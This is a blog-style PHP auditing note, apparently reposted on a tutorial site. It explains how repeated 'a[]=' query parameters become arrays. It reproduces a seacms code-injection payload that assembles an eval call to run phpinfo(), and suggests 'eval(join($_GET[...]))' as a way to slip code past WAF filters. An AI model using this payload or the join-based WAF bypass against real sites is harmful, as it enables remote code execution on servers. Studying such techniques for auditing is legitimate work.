Home > Backend Development > PHP Tutorial > Example sharing of how php sends an array through http request

Example sharing of how php sends an array through http request

黄舟
Release: 2023-03-16 18:40:01
Original
2328 people have browsed it

I recently started learning PHP auditing, and just in time to study seacms, I discovered a strange point in the payload

searchtype=5&searchword={
if{searchpage:year}&year=:e{searchpage:area}
}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
Copy after login

I tried it and found that when receiving data, for example:

Key name=a, then when passing a[]=a&a[]=b, a is an array, so we did a test, and it was true

Server-side test code

<?php
	print_r($_GET[1]);
?>
Copy after login

The test results are as follows

Example sharing of how php sends an array through http request

Example sharing of how php sends an array through http request

So what is the use of this one? After thinking about it, if there are protection tools such as security dogs or waf on the server, then using other PHP functions, such as the join function, it may be possible to achieve the bypass effect

Provide a simple idea

Server testing Code

<?php
	eval(join($_GET[123]));
?>
Copy after login

The test results are as follows

Example sharing of how php sends an array through http request

The above is the detailed content of Example sharing of how php sends an array through http request. For more information, please follow other related articles on the PHP Chinese website!

Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template